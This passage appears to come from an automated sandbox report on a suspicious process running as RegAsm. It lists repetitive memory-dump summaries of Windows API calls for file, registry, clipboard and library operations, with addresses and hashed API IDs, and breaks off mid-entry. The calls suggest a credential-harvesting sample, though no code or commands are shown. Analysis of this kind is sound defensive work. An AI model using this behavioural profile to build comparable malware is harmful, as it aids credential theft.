                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1125800050-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 568699880-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1023896661-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                      Similarity
